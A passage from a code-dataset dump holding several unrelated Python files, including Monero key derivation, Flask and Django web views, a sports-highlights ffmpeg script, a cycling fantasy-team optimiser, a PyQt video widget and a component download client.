and return its lowest 32-bytes modulo ed25519-order.\n This ensures that the result is a valid ed25519 scalar to be used as Monero private key.\n\n Args:\n data_bytes (bytes): Data bytes\n\n Returns:\n bytes: Lowest 32-bytes modulo ed25519-order\n \"\"\"\n data_int = ConvUtils.BytesToInteger(data_bytes, endianness=\"little\")\n return ConvUtils.IntegerToBytes(data_int % Ed25519Monero.Order(), bytes_num=32, endianness=\"little\")\n\n\nclass Monero:\n \"\"\" Monero class. It allows to compute Monero keys and addresses/subaddresses. \"\"\"\n\n @classmethod\n def FromSeed(cls,\n seed_bytes: bytes) -> Monero:\n \"\"\" Create from seed bytes.\n\n Args:\n seed_bytes (bytes): Seed bytes\n\n Returns:\n Monero object: Monero object\n \"\"\"\n priv_skey_bytes = (seed_bytes\n if len(seed_bytes) == Ed25519MoneroPrivateKey.Length()\n else CryptoUtils.Kekkak256(seed_bytes))\n return cls.FromPrivateSpendKey(MoneroUtils.ScReduce(priv_skey_bytes))\n\n @classmethod\n def FromBip44PrivateKey(cls,\n priv_key: Union[bytes, IPrivateKey]) -> Monero:\n \"\"\" Create from Bip44 private key bytes.\n\n Args:\n priv_key (bytes or IPrivateKey): Private key\n\n Returns:\n Monero object: Monero object\n \"\"\"\n if not isinstance(priv_key, bytes):\n priv_key = priv_key.Raw().ToBytes()\n return cls.FromPrivateSpendKey(MoneroUtils.ScReduce(CryptoUtils.Kekkak256(priv_key)))\n\n @classmethod\n def FromPrivateSpendKey(cls,\n priv_skey: Union[bytes, IPrivateKey]) -> Monero:\n \"\"\" Create from private spend key.\n\n Args:\n priv_skey (bytes or IPrivateKey): Private spend key\n\n Returns:\n Monero object: Monero object\n\n Raises:\n MoneroKeyError: If the key constructed from the bytes is not valid\n \"\"\"\n return cls(priv_key=priv_skey)\n\n @classmethod\n def FromWatchOnly(cls,\n priv_vkey: Union[bytes, IPrivateKey],\n pub_skey: Union[bytes, IPublicKey]) -> Monero:\n \"\"\" Create from private view key and public spend key (i.e. watch-only wallet).\n\n Args:\n priv_vkey (bytes or IPrivateKey): Private view key\n pub_skey (bytes or IPublicKey) : Public spend key\n\n Returns:\n Monero object: Monero object\n\n Raises:\n MoneroKeyError: If the key constructed from the bytes is not valid\n \"\"\"\n return cls(priv_key=priv_vkey,\n pub_key=pub_skey)\n\n def __init__(self,\n priv_key: Union[bytes, IPrivateKey],\n pub_key: Optional[Union[bytes, IPublicKey]] = None) -> None:\n \"\"\" Construct class.\n\n Args:\n priv_key (bytes or IPrivateKey): Private key (view key if watch-only wallet, otherwise spend key)\n pub_key (bytes or IPublicKey) : Public key (spend key, only needed for watch-only wallets, otherwise None)\n\n Returns:\n Monero object: Monero object\n\n Raises:\n MoneroKeyError: If the key constructed from the bytes is not valid\n \"\"\"\n\n # Private key object\n if pub_key is None:\n self.m_priv_skey = MoneroPrivateKey.FromBytesOrKeyObject(priv_key)\n self.m_priv_vkey = self.__ViewFromSpendKey(self.m_priv_skey)\n self.m_pub_skey = self.m_priv_skey.PublicKey()\n self.m_pub_vkey = self.m_priv_vkey.PublicKey()\n # Watch-only object\n else:\n self.m_priv_skey = None\n self.m_priv_vkey = MoneroPrivateKey.FromBytesOrKeyObject(priv_key)\n self.m_pub_skey = MoneroPublicKey.FromBytesOrKeyObject(pub_key)\n self.m_pub_vkey = self.m_priv_vkey.PublicKey()\n\n def IsWatchOnly(self) -> bool:\n \"\"\" Return if it's a watch-only object.\n\n Returns:\n bool: True if watch-only, false otherwise\n \"\"\"\n return self.m_priv_skey is None\n\n def PrivateSpendKey(self) -> MoneroPrivateKey:\n \"\"\" Return the private spend key.\n\n Returns:\n MoneroPrivateKey object: MoneroPrivateKey object\n\n Raises:\n MoneroKeyError: If the class is watch-only\n \"\"\"\n if self.IsWatchOnly():\n raise MoneroKeyError(\"Watch-only class has not a private spend key\")\n return self.m_priv_skey\n\n def PrivateViewKey(self) -> MoneroPrivateKey:\n \"\"\" Return the private view key.\n\n Returns:\n MoneroPrivateKey object: MoneroPrivateKey object\n \"\"\"\n return self.m_priv_vkey\n\n def PublicSpendKey(self) -> MoneroPublicKey:\n \"\"\" Return the public spend key.\n\n Returns:\n MoneroPublicKey object: MoneroPublicKey object\n \"\"\"\n return self.m_pub_skey\n\n def PublicViewKey(self) -> MoneroPublicKey:\n \"\"\" Return the public view key.\n\n Returns:\n MoneroPublicKey object: MoneroPublicKey object\n \"\"\"\n return self.m_pub_vkey\n\n @lru_cache()\n def PrimaryAddress(self) -> str:\n \"\"\" Return the primary address.\n\n Returns:\n str: Primary address string\n \"\"\"\n return XmrAddr.EncodeKey(self.m_pub_skey.KeyObject(),\n self.m_pub_vkey.KeyObject(),\n MoneroConst.ADDR_MAIN_NET_VER)\n\n @lru_cache()\n def SubAddress(self,\n minor_idx: int,\n major_idx: int = 0) -> str:\n \"\"\" Return the specified subaddress.\n\n Args:\n minor_idx (int) : Minor index\n major_idx (int, optional): Major index (i.e. account index)\n\n Returns:\n str: Subaddress string\n\n Raises:\n ValueError: If one of the indexes is not valid\n \"\"\"\n if minor_idx < 0 or minor_idx > MoneroConst.SUBADDR_MAX_IDX:\n raise ValueError(\"Invalid minor index (%d)\" % minor_idx)\n if major_idx < 0 or major_idx > MoneroConst.SUBADDR_MAX_IDX:\n raise ValueError(\"Invalid major index (%d)\" % major_idx)\n\n return self.__ComputeSubAddress(minor_idx, major_idx)\n\n def __ComputeSubAddress(self,\n minor_idx: int,\n major_idx: int) -> str:\n \"\"\" Compute subaddress.\n\n Args:\n minor_idx (int): Minor index\n major_idx (int): Major index (i.e. account index)\n\n Returns:\n str: Subaddress string\n\n Raises:\n ValueError: If one of the indexes is not valid\n \"\"\"\n\n # Subaddress 0,0 is the primary address\n if minor_idx == 0 and major_idx == 0:\n return self.PrimaryAddress()\n\n # Convert indexes to bytes\n major_idx_bytes = ConvUtils.IntegerToBytes(major_idx, bytes_num=MoneroConst.SUBADDR_IDX_BYTE_LEN, endianness=\"little\")\n minor_idx_bytes = ConvUtils.IntegerToBytes(minor_idx, bytes_num=MoneroConst.SUBADDR_IDX_BYTE_LEN, endianness=\"little\")\n\n # m = Kekkak256(\"SubAddr\" + master_priv_vkey + major_idx + minor_idx)\n m = CryptoUtils.Kekkak256(MoneroConst.SUBADDR_PREFIX + self.m_priv_vkey.Raw().ToBytes() + major_idx_bytes + minor_idx_bytes)\n m_int = ConvUtils.BytesToInteger(m, endianness=\"little\")\n\n # Compute subaddress public spend key\n # D = master_pub_skey + m * B\n subaddr_pub_skey = self.m_pub_skey.KeyObject().Point() + (Ed25519Monero.Generator() * m_int)\n\n # Compute subaddress public view key\n # C = master_priv_vkey * D\n subaddr_pub_vkey = subaddr_pub_skey * self.m_priv_vkey.Raw().ToInt(\"little\")\n\n # Encode subaddress\n return XmrAddr.EncodeKey(subaddr_pub_skey.Raw().ToBytes(),\n subaddr_pub_vkey.Raw().ToBytes(),\n MoneroConst.SUBADDR_MAIN_NET_VER)\n\n @staticmethod\n def __ViewFromSpendKey(priv_skey: MoneroPrivateKey) -> MoneroPrivateKey:\n \"\"\" Get the private view key from the private spend key.\n\n Args:\n priv_skey (MoneroPrivateKey object): Private spend key\n\n Returns:\n MoneroPrivateKey object: Private view key\n \"\"\"\n priv_vkey_bytes = MoneroUtils.ScReduce(CryptoUtils.Kekkak256(priv_skey.Raw().ToBytes()))\n return MoneroPrivateKey.FromBytes(priv_vkey_bytes)\n","sub_path":"bip_utils/monero/monero.py","file_name":"monero.py","file_ext":"py","file_size_in_byte":10716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"335274378","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom django.shortcuts import render\n\ndef index(request):\n\tcontext = {\n\t\t'info':\"百度\"\n\t}\n\treturn render(request,'index.html',context=context)\n\n\n","sub_path":"TryDjangoTest/chapter03/template_autoescape_demo/template_autoescape_demo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"428667525","text":"import json\n\ndef main():\n mydict = {\n 'name': '骆昊 ',\n 'qq': 34654,\n 'age': 38,\n 'friends': [\n {'brand': 'Auto', 'max_speed': 123},\n {'brand': 'QQ', 'max_speed': 100},\n {'brand': 'Benz', 'max_speed': 90}\n ]\n }\n try:\n with open('date.json', 'r', encoding='utf-8') as fs:\n json.load(fs)\n\n except IOError as e:\n print(e)\n\n\nif __name__ == '__main__':\n main()","sub_path":"day15/text/file6.py","file_name":"file6.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"18503692","text":"#!/use/bin/env python\nimport shlex, subprocess\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG)\nNUM_REDUCERS = 3\n\ndef main():\n\tdoc_process_args = \"python assignment4_p/coordinator.py --mapperPath=assignment4_p/document_store/doc_mapper.py --reducerPath=assignment4_p/document_store/doc_reducer.py --jobPath=assignment5/df_jobs --numReducers=%d\" % NUM_REDUCERS\n\tlogging.debug(\"Doc_Server mapReduce param: %s\" % doc_process_args)\n\tdoc_process_args = shlex.split(doc_process_args)\t\n\tdoc_process = subprocess.Popen(doc_process_args)\n\tdoc_return_code = doc_process.wait()\n\tif doc_return_code is not 0:\n\t\tlogging.error(\"MapReduce Doc return code %d\" % doc_return_code)\n\t\tsys.exit(2)\n\t\n\tinverted_process_args = \"python assignment4_p/coordinator.py --mapperPath=assignment4_p/inverted_index/index_mapper.py --reducerPath=assignment4_p/inverted_index/index_reducer.py --jobPath=assignment5/i_df_jobs --numReducers=%d\" % NUM_REDUCERS\n\tlogging.debug(\"Inverted_Server mapReduce param: %s\" % inverted_process_args)\n\tinverted_process_args = shlex.split(inverted_process_args)\n\tinverted_process = subprocess.Popen(inverted_process_args)\n\tinverted_return_code = inverted_process.wait()\n\tif inverted_return_code is not 0:\n\t\tlogging.error(\"MapReduce Inverted return code %d\" % inverted_return_code)\n\t\tsys.exit(2)\n\t\n\ttf_idf_args = \"python assignment4_p/coordinator.py --mapperPath=assignment4_p/idf_index/idf_mapper.py --reducerPath=assignment4_p/idf_index/idf_reducer.py --jobPath=assignment5/idf_jobs --numReducers=1\" \n\tlogging.debug(\"IDF mapReduce param: %s\" % tf_idf_args)\n\ttf_idf_args = shlex.split(tf_idf_args)\n\tidf_process = subprocess.Popen(tf_idf_args)\n\tidf_return_code = idf_process.wait()\n\tif idf_return_code is not 0:\n\t\tlogging.error(\"MapReduce IDF return code %d\" % idf_return_code)\n\t\tsys.exit(2)\n\t\t\nif __name__ == \"__main__\":\n\tmain()\n\t\n\n\n","sub_path":"sea-assignments/assignment5/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"615348729","text":"from flask import render_template, request, flash, redirect, url_for\nfrom flask_login import login_user, logout_user, login_required\nfrom . import main_blueprint as main\nfrom .forms import SignUp, SignIn, Search, AddPost, EditProfile, EditPost, DeletePost\nfrom ..models import Blogger, Blog\nfrom blog import db\nfrom config import POSTS_PER_PAGE\n\n\n@main.route('/')\n@main.route('/home')\ndef index():\n return render_template('index.html')\n\n\n@main.route('/sign-up', methods=['GET', 'POST'])\ndef sign_up():\n form = SignUp()\n if request.method == 'POST' and form.validate():\n new_blogger = Blogger(username = form.username.data,\n first_name = form.first_name.data,\n last_name = form.last_name.data,\n email = form.email.data,\n password = form.password.data)\n\n db.session.add(new_blogger)\n db.session.commit()\n flash('You registered successfully and can now log in')\n return redirect(url_for('main.index'))\n return render_template('sign-up.html', form=form)\n\n\n@main.route('/sign-in', methods=['GET', 'POST'])\ndef sign_in():\n form = SignIn()\n if request.method == 'POST':\n if form.validate_on_submit():\n blogger = Blogger.query.filter_by(username=form.username.data).first()\n if blogger is not None and blogger.verify_password(form.password.data):\n login_user(blogger)\n return redirect(url_for('main.dashboard', username=form.username.data))\n flash('You successfully logged in')\n else:\n flash('Invalid email and/or password')\n return render_template('sign-in.html', form=form)\n\n\n@main.route('/sign-out')\n@login_required\ndef sign_out():\n logout_user()\n flash('You logged out')\n return redirect(url_for('main.index'))\n\n\n@main.route('//profile/edit', methods=['GET', 'POST'])\n@login_required\ndef edit_profile(username):\n blogger = Blogger.query.filter_by(username=username).first()\n form = EditProfile(obj=blogger)\n form.populate_obj(blogger)\n if form.validate_on_submit():\n blogger.username = form.username.data\n blogger.first_name = form.first_name.data\n blogger.last_name = form.last_name.data\n blogger.email = form.email.data\n blogger.about_me = form.about_me.data\n\n db.session.add(blogger)\n db.session.commit()\n flash(\"Changes applied to profile\")\n return redirect(url_for('main.dashboard', username=form.username.data))\n return render_template('edit-profile.html', blogger=blogger, form=form)\n\n\n@main.route('/Dashboard/', methods=['GET', 'POST'])\n@main.route('/Dashboard//', methods=['GET', 'POST'])\n@login_required\ndef dashboard(username, page=1):\n form = Search()\n blogger = Blogger.query.filter_by(username=username).first()\n blogs = Blog.query.filter_by(blogger=blogger.id).paginate(page, POSTS_PER_PAGE, True)\n if form.validate_on_submit():\n search_results = Blog.query.filter(Blog.title.contains(form.item.data))\\\n .paginate(page, POSTS_PER_PAGE, True)\n return render_template('search.html', form=form, searchResults=search_results, blogger=blogger)\n return render_template('dashboard.html', form=form, blogs=blogs, blogger=blogger)\n\n\n@main.route('/Dashboard///new', methods=['GET', 'POST'])\n@login_required\ndef add_post(username, blogger_id):\n form = AddPost()\n if request.method == 'POST':\n if form.validate_on_submit():\n new_blog = Blog(title=form.title.data, content=form.content.data, blogger=blogger_id)\n db.session.add(new_blog)\n db.session.commit()\n flash(\"You added a new blog post\")\n return redirect(url_for('main.dashboard', username=username))\n return render_template('add-post.html', form=form, username=username, blogger_id=blogger_id)\n\n\n@main.route('/Dashboard///edit', methods=['GET', 'POST'])\n@login_required\ndef edit_post(username, blog_id):\n blog_to_edit = Blog.query.filter_by(id=blog_id).first()\n form = EditPost(obj=blog_to_edit)\n form.populate_obj(blog_to_edit)\n if form.validate_on_submit():\n blog_to_edit.title = form.title.data\n blog_to_edit.content = form.content.data\n db.session.add(blog_to_edit)\n db.session.commit()\n flash(\"Changes applied to a blog post\")\n return redirect(url_for('main.dashboard', username=username))\n return render_template('edit-post.html', form=form, username=username, blog_id=blog_id)\n\n\n@main.route('/Dashboard///delete', methods=['GET', 'POST'])\n@login_required\ndef delete_post(username, blog_id):\n form = DeletePost()\n blog_to_delete = Blog.query.filter_by(id=blog_id).first()\n if request.method == 'POST':\n db.session.delete(blog_to_delete)\n db.session.commit()\n flash(\"Blog post deleted\")\n return redirect(url_for('main.dashboard', username=username))\n return render_template('delete-post.html', form=form, username=username, blogToDelete=blog_to_delete)\n\n\n@main.route('/blogs')\n@main.route('/blogs/', methods=['GET', 'POST'])\ndef view_blogs(page=1):\n blogs = Blog.query.paginate(page, POSTS_PER_PAGE, True)\n return render_template('blogs.html', blogs=blogs)\n\n\n@main.route('/bloggers')\ndef view_bloggers():\n bloggers = Blogger.query.all()\n return render_template('bloggers.html', bloggers=bloggers)\n\n\n\n","sub_path":"blog/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"209610778","text":"import argparse, os, requests\nfrom collections import defaultdict\n\nfrom search import search\n\n#OUTPUT_FOLDER='./static/stream/'\nOUTPUT_FOLDER='./stream/'\ndef create_text_file(clip_names, fname):\n out_file = f'{OUTPUT_FOLDER}{fname}.txt'\n # Allowing only 10 clips\n clip_names = clip_names[:10]\n with open(out_file, 'w') as f:\n f.write('\\n'.join([f'file {fn}' for fn in clip_names]))\n \n return out_file\n\n\ndef get_highlights(batsman, bowler, shot, ball_type, runs, wicket):\n \"\"\"\n Summary: Returns the path of the compiled highlights video\n\n Parameters:\n batsman(str): Name of the batsman\n bowler(str) : Name of the bowler\n shot(str): Type of shot played\n ball_type(str): Ball type\n runs(str): Runs\n wicket(bool): true or false, None for no value\n\n Returns:\n 'out_video_path': Path to the combined highlight video clip\n \"\"\"\n\n filters = defaultdict()\n fname = ''\n\n if batsman:\n filters['batsman'] = batsman\n fname += batsman\n else:\n filters['batsman'] = ''\n\n if bowler:\n filters['bowler'] = bowler\n fname += bowler\n else:\n filters['bowler'] = ''\n\n if shot:\n filters['shot'] = shot\n fname += shot\n else:\n filters['shot'] = ''\n\n if ball_type:\n filters['ball_type'] = ball_type\n fname += ball_type\n else:\n filters['ball_type'] = ''\n\n if runs:\n filters['runs'] = runs\n fname += runs\n else:\n filters['runs'] = ''\n\n if wicket:\n filters['wicket']=True\n fname += 'wicket'\n else:\n filters['wicket']=None\n\n print(filters)\n fname = fname.strip()\n out_video_path = f'{OUTPUT_FOLDER}{fname}.mp4'\n\n if (os.path.isfile(out_video_path)):\n print('File already exists')\n else:\n clip_names = search(filters)\n txt_file = create_text_file(clip_names, fname)\n os.system(f'ffmpeg -f concat -safe 0 -i {txt_file} -c copy {out_video_path}')\n print(f'File created at {out_video_path}')\n\n return f'stream/{fname}.mp4'\n\ndef badmintonHighlightsFunction(inputUrl, email):\n URL = 'http://34.83.101.230:5000/badminton'\n PARAMS={'url': inputUrl,\n 'start_time': '00:05:00',\n 'duration': '00:04:00' ,\n 'email': email\n } \n r = requests.get(url = URL, params = PARAMS)\n return 'Done'\n\ndef tennisHighlightsFunction(inputUrl,email):\n URL = 'http://34.83.101.230:5000/tennis'\n PARAMS={'url': inputUrl,\n 'start_time': '00:05:00',\n 'duration': '00:04:00' ,\n 'email': email\n }\n r = requests.get(url = URL, params = PARAMS)\n return 'Done'\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description='Generates highlights for cricket videos')\n parser.add_argument('-b', '--batsman', help='Cricinfo link for the commentary')\n parser.add_argument('-l', '--bowler', help='Cricinfo link for the commentary')\n parser.add_argument('-s', '--shot', help='CSV file to write the data')\n parser.add_argument('-t', '--ball_type', help='Corodinates for the over position')\n parser.add_argument('-r', '--runs', help='First innings commentary for last over.')\n parser.add_argument('-w', '--wicket', help='Wickets included or not, 0 for no 1 for yes')\n\n args = parser.parse_args()\n\n get_highlights(args.batsman, args.bowler, args.shot, args.ball_type, args.runs, args.wicket)\n","sub_path":"server/highlights.py","file_name":"highlights.py","file_ext":"py","file_size_in_byte":3446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"122779915","text":"# -*- coding: utf-8 -*-\n\"\"\"\nVelogames - test algorithms\n\nAuthor: Klemen Ziberna\n\"\"\"\n\n#####################################\n# GLOBAL VARIABLES\n\nFILE_PATH = \"C:\\klemen\\Repositories\\ProCyclingStats\\Analysis_Tables\\Riders_Points\"\nCSV_FILES = [\"rider1.csv\",\n \"rider2.csv\",\n \"rider3.csv\",\n \"rider4.csv\",\n \"rider5.csv\",\n \"rider6.csv\",\n \"rider7.csv\",\n \"rider8.csv\",\n \"rider9.csv\"\n ]\n\n#####################################\n# LIBRARIES\n\nimport pandas as pd\nimport os\nimport chardet\n\n#####################################\n# FUNCTIONS\n\ndef open_csv_chardet(input_csv_file):\n \"\"\"\n Function opens the csv file, detects correct encoding, then open\n the same file as pandas df with correct encoding\n \"\"\"\n with open(input_csv_file, 'rb') as f:\n result = chardet.detect(f.read()) # or readline if the file is large\n \n csv_df = pd.read_csv(input_csv_file, encoding=result['encoding'])\n \n return csv_df\n\n\n#####################################\n# MAIN PROGRAM\n\n\n# Open the files\nrider1_df = open_csv_chardet(os.path.join(FILE_PATH, CSV_FILES[0]))\nrider2_df = open_csv_chardet(os.path.join(FILE_PATH, CSV_FILES[1]))\nrider3_df = open_csv_chardet(os.path.join(FILE_PATH, CSV_FILES[2]))\nrider4_df = open_csv_chardet(os.path.join(FILE_PATH, CSV_FILES[3]))\nrider5_df = open_csv_chardet(os.path.join(FILE_PATH, CSV_FILES[4]))\nrider6_df = open_csv_chardet(os.path.join(FILE_PATH, CSV_FILES[5]))\nrider7_df = open_csv_chardet(os.path.join(FILE_PATH, CSV_FILES[6]))\nrider8_df = open_csv_chardet(os.path.join(FILE_PATH, CSV_FILES[7]))\nrider9_df = open_csv_chardet(os.path.join(FILE_PATH, CSV_FILES[8]))\n\n\n\n# Selection algorithm\n\n# Conditions\nsel_category = 'PCS Ranking - Individual - Value'\n#sel_category = 'PCS Season - Distance - Position'\n#sel_category = 'Form_2month''\n\nmax_cost = 100 # max cost\nbest_combination = {'Value':0,\n 'Combination': \"\",\n 'Cost': 0} \n\n# Modified algorithm (less levels)\n\n \n# Main loop\n\nfor index1 in range(0,len(rider1_df)):\n print('Rider1: ' + str(index1))\n current_cost = rider1_df['Cost'][index1]\n if current_cost > max_cost - 8*4:\n continue\n\n \n for index2 in range(0,len(rider2_df)):\n print('-Rider2: ' + str(index2))\n current_cost = rider1_df['Cost'][index1] \\\n + rider2_df['Cost'][index2] \n\n if current_cost > max_cost - 7*4:\n continue\n\n \n for index3 in range(0,len(rider3_df)):\n print('--Rider3: ' + str(index3))\n current_cost = rider1_df['Cost'][index1] \\\n + rider2_df['Cost'][index2] \\\n + rider3_df['Cost'][index3]\n \n if current_cost > max_cost - 6*4:\n continue\n \n \n for index4 in range(0,len(rider4_df)):\n #print('---Rider4: ' + str(index4))\n current_cost = rider1_df['Cost'][index1] \\\n + rider2_df['Cost'][index2] \\\n + rider3_df['Cost'][index3] \\\n + rider4_df['Cost'][index4] \n \n if current_cost > max_cost - 5*4:\n continue\n \n \n for index5 in range(0,len(rider5_df)):\n #print('----Rider5: ' + str(index5))\n current_cost = rider1_df['Cost'][index1] \\\n + rider2_df['Cost'][index2] \\\n + rider3_df['Cost'][index3] \\\n + rider4_df['Cost'][index4] \\\n + rider5_df['Cost'][index5] \n \n if current_cost > max_cost - 4*4:\n continue\n \n \n# for index6 in range(0,len(rider6_df)):\n# print('-----Rider6: ' + str(index6))\n# current_cost = rider1_df['Cost'][index1] \\\n# + rider2_df['Cost'][index2] \\\n# + rider3_df['Cost'][index3] \\\n# + rider4_df['Cost'][index4] \\\n# + rider5_df['Cost'][index5] \\\n# + rider6_df['Cost'][index6] \n# \n# if current_cost > max_cost - 3*4:\n# continue\n# \n# \n# for index7 in range(0,len(rider7_df)):\n# current_cost = rider1_df['Cost'][index1] \\\n# + rider2_df['Cost'][index2] \\\n# + rider3_df['Cost'][index3] \\\n# + rider4_df['Cost'][index4] \\\n# + rider5_df['Cost'][index5] \\\n# + rider6_df['Cost'][index6] \\\n# + rider7_df['Cost'][index7] \n# \n# if current_cost > max_cost - 2*4:\n# continue\n# \n# \n# for index8 in range(0,len(rider8_df)):\n# current_cost = rider1_df['Cost'][index1] \\\n# + rider2_df['Cost'][index2] \\\n# + rider3_df['Cost'][index3] \\\n# + rider4_df['Cost'][index4] \\\n# + rider5_df['Cost'][index5] \\\n# + rider6_df['Cost'][index6] \\\n# + rider7_df['Cost'][index7] \\\n# + rider8_df['Cost'][index8] \n# \n# if current_cost > max_cost - 1*4:\n# continue\n \n \n for index9 in range(0,len(rider9_df)):\n current_cost = rider1_df['Cost'][index1] \\\n + rider2_df['Cost'][index2] \\\n + rider3_df['Cost'][index3] \\\n + rider4_df['Cost'][index4] \\\n + rider5_df['Cost'][index5] \\\n + rider9_df['Cost'][index9] \n #+ rider6_df['Cost'][index6] \\\n #+ rider7_df['Cost'][index7] \\\n #+ rider8_df['Cost'][index8] \\\n #+ rider9_df['Cost'][index9] \n \n if current_cost > max_cost - 3*4:\n continue\n \n selection_value = \\\n rider1_df[sel_category][index1] \\\n + rider2_df[sel_category][index2] \\\n + rider3_df[sel_category][index3] \\\n + rider4_df[sel_category][index4] \\\n + rider5_df[sel_category][index5] \\\n + rider9_df[sel_category][index9]\n #+ rider6_df[sel_category][index6] \\\n #+ rider7_df[sel_category][index7] \\\n #+ rider8_df[sel_category][index8] \\\n #+ rider9_df[sel_category][index9]\n \n if selection_value <= best_combination['Value']:\n continue\n \n else:\n best_combination['Value'] = float(selection_value)\n best_combination['Combination'] = [\n rider1_df['Name'][index1],\n rider2_df['Name'][index2],\n rider3_df['Name'][index3],\n rider4_df['Name'][index4],\n rider5_df['Name'][index5],\n rider9_df['Name'][index9]\n #rider6_df['Name'][index6],\n #rider7_df['Name'][index7],\n #rider8_df['Name'][index8],\n #rider9_df['Name'][index9]\n ]\n best_combination['Cost'] = int(current_cost)\n \n #print('New best selection found:')\n #rint(best_combination['Combination'])\n \n \n\n\n# End\n\n\n\n\n\n\n\n\n","sub_path":"velogames_algorithms_short.py","file_name":"velogames_algorithms_short.py","file_ext":"py","file_size_in_byte":9066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"302851624","text":"from PyQt5.QtCore import *\r\nfrom PyQt5.QtGui import *\r\nfrom PyQt5.QtWidgets import *\r\nimport numpy as np\r\n\r\nclass VideoPlot(QLabel):\r\n \"\"\" Displays a video-frame as a QLabel\r\n Drawing is relaized such that the aspect-ratio is kept constant\r\n and the image fills up all the available space in the layout the VideoPlot is contained in\"\"\"\r\n def __init__(self, video, parent=None, centered = True):\r\n super(VideoPlot, self).__init__(parent)\r\n\r\n self.video = None\r\n\r\n #set background to black and border to 0\r\n self.setStyleSheet(\"background-color: rgb(0,0,0); margin:0px; border:0px solid rgb(0, 255, 0); \")\r\n\r\n self.setMinimumSize(320, 180)#Set minimum size\r\n self.setSizePolicy(QSizePolicy.Expanding,QSizePolicy.Expanding)# Set size policy to expanding\r\n self.setAlignment(Qt.AlignCenter)\r\n self.update()\r\n\r\n def set_video(video):\r\n self.video = video\r\n\r\n def resizeEvent(self, event):\r\n \"\"\" Rescales the Pixmap that contains the image when QLabel changes size\r\n Args:\r\n event: QEvent\r\n \"\"\"\r\n size = self.size()\r\n size = QSize(int(size.width()),int(size.height()))\r\n scaledPix = self.pixmap.scaled(size, Qt.KeepAspectRatio, transformMode = Qt.FastTransformation )\r\n self.setPixmap(scaledPix)\r\n\r\n def update(self, frame = None):\r\n \"\"\" Upates the pixmap when a new frame is to be displays. Triggers the Qt eventpipeline.\r\n \"\"\"\r\n\r\n if type(frame) == type(None):#Init blank frame if no video is set yet\r\n frame = np.ndarray((9,16,3), dtype = np.byte)\r\n frame.fill(100)\r\n\r\n height, width, channel = frame.shape\r\n bytesPerLine = 3 * width\r\n image = QImage(frame.data, width, height, bytesPerLine, QImage.Format_RGB888)\r\n self.pixmap = QPixmap(image)\r\n size = self.size()\r\n scaledPix = self.pixmap.scaled(size, Qt.KeepAspectRatio, transformMode = Qt.FastTransformation)\r\n self.setPixmap(scaledPix)\r\n\r\n #QCoreApplication.processEvents()\r\n","sub_path":"videoplot.py","file_name":"videoplot.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"170951160","text":"\"\"\"Component source that downloads components from web service\"\"\"\n\nimport os\nimport re\nimport shutil\nimport tempfile\nfrom hashlib import sha256\nfrom io import open\n\nimport requests\n\nimport idf_component_tools.api_client as api_client\n\nfrom ..archive_tools import ArchiveError, get_format_from_path, unpack_archive\nfrom ..errors import FetchingError\nfrom .base import BaseSource\n\ntry:\n from urllib.parse import urlparse # type: ignore\nexcept ImportError:\n from urlparse import urlparse # type: ignore\n\ntry:\n from typing import Dict\nexcept ImportError:\n pass\n\n\ndef default_component_service_url():\n print('GOT HERE')\n return os.getenv('DEFAULT_COMPONENT_SERVICE_URL') or 'https://api.components.espressif.com/'\n\n\nDEFAULT_NAMESPACE = 'espressif'\n\n\nclass WebServiceSource(BaseSource):\n NAME = 'service'\n\n def __init__(self, source_details=None):\n super(WebServiceSource, self).__init__(source_details=source_details)\n self.base_url = str(self.source_details.get('service_url', default_component_service_url()))\n self.api_client = self.source_details.get(\n 'api_client', api_client.APIClient(base_url=self.base_url, source=self))\n\n @classmethod\n def required_keys(cls):\n return ['service_url']\n\n @property\n def hash_key(self):\n if self._hash_key is None:\n url = urlparse(self.base_url)\n netloc = url.netloc\n path = '/'.join(filter(None, url.path.split('/')))\n normalized_path = '/'.join([netloc, path])\n self._hash_key = sha256(normalized_path.encode('utf-8')).hexdigest()\n return self._hash_key\n\n @staticmethod\n def is_me(name, details):\n # This should be run last\n return True\n\n def versions(self, name, details=None, spec='*'):\n cmp_with_versions = self.api_client.versions(name, spec)\n\n if not cmp_with_versions:\n raise FetchingError('Cannot get versions of \"%s\"' % name)\n\n return cmp_with_versions\n\n def unique_path(self, name, version): # type: (str, str) -> str\n \"\"\"Unique identifier for cache\"\"\"\n return '~'.join([name.replace('/', '~~'), str(version), self.hash_key])\n\n @property\n def component_hash_required(self): # type: () -> bool\n return True\n\n @property\n def downloadable(self): # type: () -> bool\n return True\n\n def normalized_name(self, name):\n if '/' not in name:\n name = '/'.join([DEFAULT_NAMESPACE, name])\n\n return name\n\n def download(self, component, download_path):\n # Check for required components\n\n if not component.component_hash:\n raise FetchingError('Component hash is required for componets from web service')\n\n if not component.version:\n raise FetchingError('Version should provided for %s' % component.name)\n\n component = self.api_client.component(component.name, component.version)\n url = component.download_url\n\n if not url:\n raise FetchingError(\n 'Unexpected response: URL wasn\\'t found for version %s of \"%s\"',\n component.version,\n component.name,\n )\n\n with requests.get(url, stream=True, allow_redirects=True) as r:\n\n # Trying to get extension from url\n original_filename = url.split('/')[-1]\n\n try:\n extension = get_format_from_path(original_filename)[1]\n except ArchiveError:\n extension = None\n\n if r.status_code != 200:\n raise FetchingError(\n 'Cannot download component %s@%s. Server returned HTTP code %s' %\n (component.name, component.version, r.status_code))\n\n # If didn't find anything useful, trying content disposition\n content_disposition = 